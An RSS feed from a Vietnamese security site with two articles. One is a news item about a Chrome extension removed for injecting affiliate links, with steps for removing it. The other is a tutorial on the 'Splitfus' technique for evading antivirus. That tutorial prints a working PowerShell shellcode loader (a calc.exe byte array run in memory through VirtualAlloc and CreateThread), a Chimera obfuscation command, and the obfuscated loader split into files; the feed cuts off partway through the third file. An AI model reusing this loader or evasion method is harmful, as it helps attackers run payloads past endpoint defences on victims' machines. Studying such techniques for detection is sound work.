<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>mã độc &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/tag/ma-doc/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Thu, 19 Mar 2026 14:25:28 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>mã độc &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan!</title>
		<link>https://anonyviet.com/save-image-as-type-chua-ma-doc-go-ngay-keo-mat-tien-oan/</link>
					<comments>https://anonyviet.com/save-image-as-type-chua-ma-doc-go-ngay-keo-mat-tien-oan/#respond</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Thu, 19 Mar 2026 14:25:28 +0000</pubDate>
				<category><![CDATA[Mạng cơ bản]]></category>
		<category><![CDATA[Extension]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[Save image as type]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=99435</guid>

					<description><![CDATA[Save image as Type chứa mã độc là thông tin gây chấn động cộng đồng người dùng Chrome toàn cầu. Tiện ích quen thuộc với hơn một triệu lượt tải đã bất ngờ bị Google thẳng tay loại bỏ khỏi cửa hàng trực tuyến. Hãy cùng AnonyViet tìm hiểu sự thật đằng sau vụ việc [&#8230;]]]></description>
										<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Save image as Type chứa mã độc</strong> là thông tin gây chấn động cộng đồng người dùng Chrome toàn cầu. Tiện ích quen thuộc với hơn một triệu lượt tải đã bất ngờ bị Google thẳng tay loại bỏ khỏi cửa hàng trực tuyến. Hãy cùng AnonyViet tìm hiểu sự thật đằng sau vụ việc nghiêm trọng này.</p>
<h2 style="text-align: justify;"><strong>Tiện ích triệu người dùng biến mất không dấu vết</strong></h2>
<p style="text-align: justify;">Vừa qua, cộng đồng công nghệ, đặc biệt là trên diễn đàn Reddit, đã xôn xao trước thông tin tiện ích mở rộng &#8220;<strong>Save image as Type</strong>&#8221; đột ngột bị vô hiệu hóa trên trình duyệt <a href="https://anonyviet.com/2-cach-don-gian-fix-loi-chrome-bi-chan-boi-family-safety/"><strong>Chrome</strong></a>. Không chỉ ngừng hoạt động, tiện ích này còn bị xóa sổ hoàn toàn khỏi Chrome Web Store, trang giới thiệu cũng không thể truy cập được nữa.</p>
<p style="text-align: justify;">Nguyên nhân được Google đưa ra là do công cụ này chứa phần mềm độc hại. Đây là một đòn giáng mạnh vào lòng tin của hơn <strong>1.000.000 người dùng</strong> đã cài đặt và tin tưởng nó. Trước đây, &#8220;Save image as Type&#8221; rất được yêu thích vì tính năng vượt trội: cho phép người dùng tải về hình ảnh dưới các định dạng phổ biến như JPG hay PNG, ngay cả khi quản trị viên trang web đã cố tình chặn tính năng này từ menu chuột phải thông thường.</p>
<figure id="attachment_99437" aria-describedby="caption-attachment-99437" style="width: 600px" class="wp-caption aligncenter"><img fetchpriority="high" decoding="async" class="wp-image-99437 size-full" src="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-1.jpg" alt="Tiện ích triệu người dùng biến mất không dấu vết" width="600" height="400" title="Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan! 1" srcset="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-1.jpg 600w, https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-1-300x200.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /><figcaption id="caption-attachment-99437" class="wp-caption-text">Tiện ích triệu người dùng biến mất không dấu vết</figcaption></figure>
<h2 style="text-align: justify;"><strong>Save image as Type chứa mã độc hoạt động ra sao?</strong></h2>
<p style="text-align: justify;">Theo phân tích từ các chuyên gia bảo mật của AnTuTu và XDA, mã độc không nằm ở chức năng chính của tiện ích mà được giấu kín trong một tệp tin có tên inject.js. Cơ chế hoạt động của nó vô cùng tinh vi và khó phát hiện:</p>
<ul style="text-align: justify;">
<li><strong>Kích hoạt kết nối:</strong> Khi người dùng duyệt web, đoạn mã này sẽ âm thầm kết nối đến một máy chủ từ xa để tải về một danh sách các URL mục tiêu.</li>
<li><strong>Chèn mã theo dõi:</strong> Khi người dùng truy cập vào một trong 578 trang web có trong danh sách (chủ yếu là các trang thương mại điện tử lớn), tiện ích sẽ tự động chèn các đoạn mã tiếp thị liên kết (affiliate links) của kẻ xấu.</li>
<li><strong>Chiếm đoạt hoa hồng:</strong> Nếu người dùng thực hiện mua sắm, khoản tiền hoa hồng đáng lẽ thuộc về các nhà tiếp thị chân chính hoặc chủ nhân liên kết gốc sẽ bị chuyển hướng vào túi của kẻ phát tán mã độc.</li>
</ul>
<p style="text-align: justify;">Hành vi này, dù không trực tiếp cài virus phá hủy máy tính, nhưng lại là một hình thức đánh cắp dữ liệu và trục lợi mờ ám, tương tự như vụ việc của tiện ích nổi tiếng Honey trước đây. Rõ ràng, việc Save image as Type chứa mã độc là một mối nguy hiểm thực sự cho người dùng.</p>
<figure id="attachment_99439" aria-describedby="caption-attachment-99439" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class="wp-image-99439 size-full" src="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-3.jpg" alt="Save image as Type chứa mã độc hoạt động ra sao?" width="600" height="284" title="Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan! 2" srcset="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-3.jpg 600w, https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-3-300x142.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /><figcaption id="caption-attachment-99439" class="wp-caption-text">Save image as Type chứa mã độc hoạt động ra sao?</figcaption></figure>
<h2 style="text-align: justify;"><strong>Ai đứng sau sự thay đổi nguy hiểm này?</strong></h2>
<p style="text-align: justify;">Điều gì đã biến một công cụ hữu ích thành phần mềm gián điệp? Dữ liệu cho thấy một sự thay đổi đáng ngờ vào khoảng tháng 8 vừa qua. Email của nhà phát triển đã được đổi từ &#8220;Image4Tools&#8221; sang một cá nhân tên là &#8220;Lauren Bridge&#8221;.</p>
<p style="text-align: justify;">Giả thuyết lớn nhất được đặt ra là tiện ích này đã được bán lại sau khi đạt được cột mốc 1 triệu người dùng. Chủ sở hữu mới đã lợi dụng cơ sở người dùng khổng lồ sẵn có để cập nhật và chèn thêm mã độc nhằm mục đích kiếm lợi bất chính. Đáng chú ý, Microsoft đã nhận ra sự nguy hiểm và gỡ bỏ tiện ích này khỏi trình duyệt Edge từ cuối năm ngoái. Tuy nhiên, phải đến tận bây giờ, Google Chrome mới có động thái xử lý triệt để.</p>
<figure id="attachment_99438" aria-describedby="caption-attachment-99438" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class="wp-image-99438 size-full" src="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-2.jpg" alt="Ai đứng sau sự thay đổi nguy hiểm này?" width="600" height="290" title="Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan! 3" srcset="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-2.jpg 600w, https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-2-300x145.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /><figcaption id="caption-attachment-99438" class="wp-caption-text">Ai đứng sau sự thay đổi nguy hiểm này?</figcaption></figure>
<h2 style="text-align: justify;"><strong>Đâu là giải pháp thay thế an toàn?</strong></h2>
<p style="text-align: justify;">Với sự sụp đổ của &#8220;Save image as Type&#8221;, nhiều người dùng đang tìm kiếm một công cụ thay thế đáng tin cậy. Một trong những lựa chọn được cộng đồng đề xuất là &#8220;<a href="https://chromewebstore.google.com/detail/save-image-as-png/nkokmeaibnajheohncaamjggkanfbphi" rel="noopener"><strong>Save Image As PNG</strong></a>&#8220;. Dưới đây là bảng so sánh nhanh để bạn có cái nhìn tổng quan:</p>
<table style="width: 74.4023%;">
<tbody>
<tr>
<td style="text-align: center; width: 21.9436%;"><b>Tiêu chí</b></td>
<td style="text-align: center; width: 32.4451%;"><b>Save image as Type (Đã bị gỡ)</b></td>
<td style="text-align: center; width: 33.3591%;"><b>Save Image As PNG (Thay thế)</b></td>
</tr>
<tr>
<td style="text-align: center; width: 21.9436%;"><b>Lượng người dùng</b></td>
<td style="text-align: center; width: 32.4451%;"><span style="font-weight: 400;">Hơn 1.000.000</span></td>
<td style="text-align: center; width: 33.3591%;"><span style="font-weight: 400;">Khoảng 400.000</span></td>
</tr>
<tr>
<td style="text-align: center; width: 21.9436%;"><b>Tính năng chính</b></td>
<td style="text-align: center; width: 32.4451%;"><span style="font-weight: 400;">Lưu ảnh dưới nhiều định dạng (JPG, PNG, WebP)</span></td>
<td style="text-align: center; width: 33.3591%;"><span style="font-weight: 400;">Tập trung lưu ảnh dưới dạng PNG</span></td>
</tr>
<tr>
<td style="text-align: center; width: 21.9436%;"><b>Tình trạng bảo mật</b></td>
<td style="text-align: center; width: 32.4451%;"><b>Chứa mã độc</b><span style="font-weight: 400;">, đã bị Google xóa</span></td>
<td style="text-align: center; width: 33.3591%;"><span style="font-weight: 400;">An toàn, tuân thủ chính sách của Chrome</span></td>
</tr>
<tr>
<td style="text-align: center; width: 21.9436%;"><b>Mức độ tin cậy</b></td>
<td style="text-align: center; width: 32.4451%;"><span style="font-weight: 400;">Rất thấp (đã bị bán và cài mã độc)</span></td>
<td style="text-align: center; width: 33.3591%;"><span style="font-weight: 400;">Cao (nhà phát triển minh bạch)</span></td>
</tr>
</tbody>
</table>
<figure id="attachment_99441" aria-describedby="caption-attachment-99441" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class="wp-image-99441 size-full" src="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-5.jpg" alt="Save Image As PNG" width="600" height="152" title="Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan! 4" srcset="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-5.jpg 600w, https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-5-300x76.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /><figcaption id="caption-attachment-99441" class="wp-caption-text">Save Image As PNG</figcaption></figure>
<p style="text-align: justify;">Mặc dù có lượng người dùng ít hơn, &#8220;Save Image As PNG&#8221; lại là một lựa chọn an toàn và tuân thủ nghiêm ngặt các quy định của Chrome, giúp bạn yên tâm sử dụng mà không lo bị theo dõi.</p>
<h2 style="text-align: justify;"><strong>Hướng dẫn kiểm tra và gỡ bỏ tiện ích độc hại khỏi Chrome</strong></h2>
<p style="text-align: justify;">Nếu bạn đã cài đặt &#8220;Save image as Type&#8221;, hãy gỡ bỏ nó ngay lập tức theo các bước sau:</p>
<p style="text-align: justify;"><strong>Bước 1:</strong> Mở trình duyệt Chrome, nhập<strong> chrome://extensions</strong> vào thanh địa chỉ và nhấn Enter.</p>
<p style="text-align: justify;"><strong>Bước 2:</strong> Trong danh sách các tiện ích đã cài đặt, tìm đến &#8220;<strong>Save image as Type</strong>&#8220;.</p>
<p style="text-align: justify;"><strong>Bước 3:</strong> Nhấn vào nút &#8220;<strong>Xóa</strong>&#8221; và xác nhận để gỡ bỏ hoàn toàn tiện ích khỏi trình duyệt của bạn.</p>
<p style="text-align: justify;">Việc gỡ bỏ này sẽ ngăn chặn mọi hoạt động thu thập dữ liệu trong tương lai.</p>
<figure id="attachment_99440" aria-describedby="caption-attachment-99440" style="width: 600px" class="wp-caption aligncenter"><img decoding="async" class="wp-image-99440 size-full" src="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-4.jpg" alt="Hướng dẫn kiểm tra và gỡ bỏ tiện ích độc hại khỏi Chrome" width="600" height="357" title="Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan! 5" srcset="https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-4.jpg 600w, https://anonyviet.com/wp-content/uploads/2026/03/save-image-as-type-chua-ma-doc-4-300x179.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /><figcaption id="caption-attachment-99440" class="wp-caption-text">Hướng dẫn kiểm tra và gỡ bỏ tiện ích độc hại khỏi Chrome</figcaption></figure>
<h2 style="text-align: justify;"><strong>Lời kết</strong></h2>
<p style="text-align: justify;">Sự việc<strong> Save image as Type chứa mã độc</strong> một lần nữa cho thấy không phải tiện ích nào có nhiều lượt tải cũng an toàn. Người dùng cần hết sức cảnh giác, kiểm tra kỹ lưỡng các quyền truy cập trước khi cài đặt bất kỳ công cụ nào vào trình duyệt của mình.</p>
<h2 style="text-align: justify;"><strong>Những câu hỏi thường gặp (Q&amp;A)</strong></h2>
<p style="text-align: justify;"><strong>1. Tiện ích này có đánh cắp mật khẩu của tôi không?</strong></p>
<p style="text-align: justify;">Theo báo cáo, mã độc chủ yếu tập trung vào việc chèn link tiếp thị để chiếm đoạt hoa hồng, không có bằng chứng cho thấy nó trực tiếp đánh cắp mật khẩu hay thông tin tài chính.</p>
<p style="text-align: justify;"><strong>2. Tôi đã gỡ tiện ích rồi, có cần làm gì thêm không?</strong></p>
<p style="text-align: justify;">Việc gỡ bỏ tiện ích đã ngăn chặn hành vi độc hại. Để an toàn hơn, bạn có thể xóa cache và cookie của trình duyệt để loại bỏ các mã theo dõi còn sót lại.</p>
<p style="text-align: justify;"><strong>3. Làm sao để nhận biết một tiện ích mở rộng an toàn?</strong></p>
<p style="text-align: justify;">Hãy kiểm tra nhà phát triển có uy tín không, đọc các bài đánh giá gần đây (không chỉ xem điểm tổng), và đặc biệt chú ý đến các quyền mà tiện ích yêu cầu khi cài đặt. Một tiện ích lưu ảnh không cần quyền &#8220;đọc và thay đổi tất cả dữ liệu trên các trang web bạn truy cập&#8221;.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/save-image-as-type-chua-ma-doc-go-ngay-keo-mat-tien-oan/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell</title>
		<link>https://anonyviet.com/cach-hacker-su-dung-ki-thuat-splitfus/</link>
					<comments>https://anonyviet.com/cach-hacker-su-dung-ki-thuat-splitfus/#respond</comments>
		
		<dc:creator><![CDATA[Hevin]]></dc:creator>
		<pubDate>Sun, 20 Jul 2025 03:14:16 +0000</pubDate>
				<category><![CDATA[Virus-Trojan-Rat]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[Splitfus]]></category>
		<category><![CDATA[virus]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=91207</guid>

					<description><![CDATA[Hiện nay, các hệ thống phòng thủ như Antivirus (AV) và Endpoint Detection &#38; Response (EDR) ngày càng mạnh mẽ. Tuy nhiên, các nhóm hacker vẫn liên tục sáng tạo những kỹ thuật tinh vi để vượt qua lớp bảo vệ này. Một trong những kỹ thuật phổ biến đó là Splitfus. Đây là phương [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Hiện nay, các hệ thống phòng thủ như Antivirus (AV) và Endpoint Detection &amp; Response (EDR) ngày càng mạnh mẽ. Tuy nhiên, các nhóm hacker vẫn liên tục sáng tạo những kỹ thuật tinh vi để vượt qua lớp bảo vệ này. Một trong những kỹ thuật phổ biến đó là <strong>Splitfus.</strong> Đây là phương pháp chia nhỏ mã độc PowerShell và làm rối code (obfuscate), sau đó thực thi từng phần theo nhiều giai đoạn (staged delivery). Vậy vì sao kỹ thuật này lại hiệu quả đến vậy? Hãy cùng mình đi tìm hiểu nhé !</p>
<h1><strong>Splitfus là gì ?</strong></h1>
<p>Splitfus (viết tắt của <strong>Split + Obfuscation</strong>) là kỹ thuật mà hacker sử dụng để:</p>
<ul>
<li><strong>Chia nhỏ (split)</strong> mã độc PowerShell thành nhiều đoạn, ví dụ: malware1.ps1, malware2.ps1, malware3.ps1,…</li>
<li><strong>Làm rối (obfuscate)</strong> từng đoạn mã để tránh bị phân tích hoặc phát hiện bởi chữ ký của AV</li>
<li><strong>Thực thi theo nhiều giai đoạn (staged execution)</strong>: Khi thực hiện tấn công, máy nạn nhân sẽ tải từng đoạn mã từ máy chủ hacker và chạy trực tiếp trong bộ nhớ, thay vì lưu toàn bộ payload trên đĩa. Đây là kiểu thực thường được biết đến với tên gọi <strong>multi-stage attack</strong> hoặc <strong>fileless malware</strong></li>
</ul>
<h1>Tại sao Splitfus hiệu quả trong việc vượt qua Antivirus ?</h1>
<ul>
<li><strong>Giảm khả năng bị phát hiện theo chữ ký (signature-based detection)</strong></li>
<li>AV truyền thống dựa vào chữ ký hoặc mẫu mã độc. Khi mã độc được chia nhỏ và mã hóa, không có đoạn nào chứa toàn bộ payload, khiến việc phát hiện trở nên khó khăn</li>
<li><strong>Tránh quét tĩnh và sandbox</strong>
<ul>
<li>Nếu toàn bộ payload nằm trong một file, AV dễ dàng phân tích trước khi chạy</li>
<li>Với Splitfus, mã độc được tải động (on-demand) từ máy chủ hacker, nên môi trường sandbox khó tái hiện được toàn bộ quy trình</li>
</ul>
</li>
<li><strong>Bypass AMSI (Antimalware Scan Interface)</strong></li>
<li>AMSI của Windows có khả năng quét nội dung PowerShell trước khi thực thi. Tuy nhiên, với Splitfus:
<ul>
<li>Các đoạn mã nhỏ, obfuscated và tải động → khó bị AMSI phân tích đầy đủ</li>
<li>Nhiều hacker còn kết hợp <strong>AMSI bypass</strong> với Splitfus để tăng hiệu quả</li>
</ul>
</li>
<li><strong>Linh hoạt và dễ cập nhật</strong></li>
<li>Hacker có thể thay đổi một đoạn bất kỳ trên máy chủ mà không cần phát tán lại toàn bộ payload. Điều này khiến việc truy vết hoặc phát triển chữ ký AV trở nên khó hơn</li>
</ul>
<p>Phần lý thuyết đơn giản ngắn gọn vậy thôi, bây giờ mình sẽ lấy ví dụ thực tế cho bạn dễ hình dung hơn cách kỹ thuật được thực hiện</p>
<h1>Ví dụ thực tế</h1>
<p>Nhiều chiến dịch tấn công APT và malware framework như <strong>Cobalt Strike, PowerShell Empire, Metasploit</strong> đã áp dụng cơ chế tương tự Splitfus để phát tán payload staged. Đây là xu hướng phổ biến trong các cuộc tấn công fileless hiện nay.</p>
<p>Được rồi, bây giờ cùng mình thử chạy 1 đoạn code Powershell sau: Write-Host &#8220;Invoke-Mimikatz&#8221; . Ồ bạn thấy đấy, Antivirus đã phát hiện và chặn đoạn mã này. Đây là chỉ 1 đoạn mã in ra chuỗi trên terminal mà tại sao lại bị chặn nhỉ ? Bởi vì nó chứa chuỗi ký tự <strong>“Invoke-Mimikatz”</strong>. Đây là một <strong>chữ ký (signature)</strong> cực kỳ nổi tiếng và đặc trưng của công cụ tấn công <strong>Mimikatz</strong></p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-18-221618-png.png" alt="Screenshot 2025-07-18 221618.png" title="Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 10"></p>
<p>Như vậy, các AV được cấu hình để chặn ngay lập tức bất kỳ đoạn mã nào chứa chữ ký nguy hiểm này, ngay cả ở giai đoạn sớm nhất, nhằm ngăn chặn mọi ý đồ tiềm tàng liên quan đến Mimikatz. Đây là một biện pháp phòng ngừa rủi ro.</p>
<p>Vậy là chúng ta đã biết cách AV được cấu hình, giờ hãy thử tách chuỗi &#8220;Invoke-Mimikatz&#8221; thành nhiều chuỗi ngắn khác nhau.</p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-18-221712-png.png" alt="Screenshot 2025-07-18 221712.png" title="Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 11"></p>
<p>Như bạn thấy, dù tách chuỗi thành các phần nhỏ như “Invo”, “ke”, “-Mim”, “ikatz”, AV vẫn không phát hiện ra đoạn mã độc. Sau đó, khi chúng ta nối lại các chuỗi này trong quá trình thực thi kết quả vẫn là “Invoke-Mimikatz” nhưng đã vượt qua được hệ thống phát hiện của AV. Đây chính là ví dụ đơn giản nhất của kỹ thuật Splitfus</p>
<p>Bây giờ chúng ta cùng xem 1 ví dụ khai thác thực tế hơn với đoạn code Powershell sau, với file tên là sc-original.ps1</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)

function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));
[IntPtr] $result = 0;
try {
Write-Host "First Invoke - $moduleName $functionName";
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}catch {
Write-Host "Second Invoke - $moduleName $functionName";
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);
$result = $tmp[0].Invoke($null, @($handle, $functionName));
}
return $result;
}

function getDelegateType {
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}

$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)</pre>
<p>Đây là đoạn mã Powershell thực thi Shellcode của calc.exe trên Windows, nếu chúng ta thực thi toàn bộ đoạn mã này thì sẽ bị AV chặn. Và lúc này mình sẽ áp dụng kĩ thuật Splitfus. Trước tiên mình sẽ sử dụng công cụ <a href="https://github.com/tokyoneon/Chimera.git" rel="noopener">Chimera</a> để xáo trộn đoạn mã này trở nên khó đọc hơn với câu lệnh sau</p>
<p><code>./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1</code></p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-19-121306-png.png" alt="Screenshot 2025-07-19 121306.png" title="Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 12"></p>
<p>Giờ đây, đoạn mã Powershell ban đầu đã được làm rối bằng cách thay đổi biến. Tiếp theo, mình sẽ chia tệp này thành nhiều phần nhỏ hơn để thực thi một cách rời rạc, khiến hệ thống bảo mật không thể phát hiện ra chữ ký đặc trưng của shellcode</p>
<p>Tiếp theo, mình chia tệp sc-obf.ps1 thành 4 tệp riêng biệt: sc1.ps1 ( chứa biến lưu trữ Shellcode ), sc2.ps1 ( chứa hàm LookupFunc đã làm rối ), sc3.ps1 ( chứa hàm getDelegateType đã làm rối ) và sc4.ps1 ( chứa 3 dòng code cuối cùng ). Mỗi phần này nếu bị quét riêng lẻ sẽ không gây cảnh báo từ AV. Đây là đoạn code đã xáo trộn và tách ra riêng biệt từng file như mình nói</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc1.ps1
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)</pre>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc2.ps1
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;
try {
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}catch {
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));
}
return $XHcKpPqwXEaSejzfchayBW;
}</pre>
<p>&nbsp;</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc3.ps1
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {
